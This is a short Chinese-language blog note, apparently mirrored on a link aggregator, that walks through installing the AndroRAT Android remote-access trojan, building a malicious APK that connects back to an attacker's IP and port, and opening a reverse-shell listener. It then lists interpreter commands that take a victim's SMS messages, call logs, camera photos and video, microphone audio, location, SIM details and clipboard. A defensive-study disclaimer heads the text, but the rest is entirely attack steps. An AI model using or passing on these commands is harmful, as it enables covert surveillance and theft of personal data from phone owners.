3

【笔记】AndroRAT安卓远控

 1 year ago
source link: https://loli.fj.cn/2023/01/10/AndroRAT%E5%AE%89%E5%8D%93%E8%BF%9C%E6%8E%A7/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

AndroRAT安卓远控

本文仅用于网络信息防御学习

apt install zipalign
git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip3 install -r requirements.txt

生成APK

<ip>:指定攻击机的IP地址
<port>:指定攻击机的监听端口

python3 androRAT.py --build -i <ip> -p <port>

反弹Shell监听

<ip>:指定攻击机的IP地址
<port>:指定攻击机的监听端口

python3 androRAT.py --shell -i <ip> -p <port>

反弹Shell的命令

获取Android的Shell

Interpreter:/> shell

获取收件箱

Interpreter:/> getSMS inbox
Interpreter:/> getSMS sent

获取通话记录

Interpreter:/> getCallLogs

查看摄像头列表

Interpreter:/> camList

<camid>:摄像头编号

Interpreter:/> takepic <camid>

通过摄像头录制

Interpreter:/> startVideo <camid>
Interpreter:/> stopVideo <camid>

通过麦克风录制

Interpreter:/> startAudio <camid>
Interpreter:/> stopAudio <camid>

获取系统信息

Interpreter:/> deviceInfo

获取SIM卡信息

Interpreter:/> getSimDetails
Interpreter:/> getLocation

获取IP地址

Interpreter:/> getIP

获取MAC地址

Interpreter:/> getMACAddress

获取剪贴板

Interpreter:/> getClipData
Interpreter:/> clear
Interpreter:/> exit

哔哩哔哩——黑粉科技HyphenTech


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK